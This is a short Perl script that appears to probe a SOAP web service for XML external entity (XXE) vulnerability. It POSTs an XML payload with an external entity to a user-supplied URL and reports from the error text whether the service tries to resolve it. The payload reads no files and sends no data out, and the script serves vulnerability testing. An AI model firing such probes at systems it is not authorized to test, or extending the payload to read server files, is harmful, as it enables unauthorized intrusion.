#!/usr/bin/perl
# Xml eXternal Entity attack test, by luna@aditel.org

use LWP::UserAgent;

$url=$ARGV[0] || die "Usage: $0 <url-to-soap-service>";


$send=qq@<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE test [ <!ENTITY hum SYSTEM "XXE-dreyer-Test"> ]>
<test>&hum;</test>@;

print "[*] XXE Web Service Attack checker - luna@aditel.org\n";
print "[*] Trying $url \n";

$ua = LWP::UserAgent->new;
$req = HTTP::Request->new(POST => $url );

$req->content_type('text/xml');
$req->content($send);
$res = $ua->request($req);

if ($res->is_success) {
    print "[*] Possibly Not vulnerable to XXE\n";
} else {
    $output=$res->content;
    if($output=~/<faultstring[^>]+>([^<]+)<\/faultstring>/) {
       $output=$1;
    }
    if($output=~ /couldn't resolve external entity/) {
       print "[+] Attention SOAP service at $url is vulnerable!!\n"; 
    } elsif ($output=~ /not allowed/) {
       print "[-] Web Service not vulnerable\n"; 
    } else {
       print "[?] Check the resposne below\n";
    }
    print "\n---------------------Output:\n";
    print $output;
    print "\n----------------------------\n";
}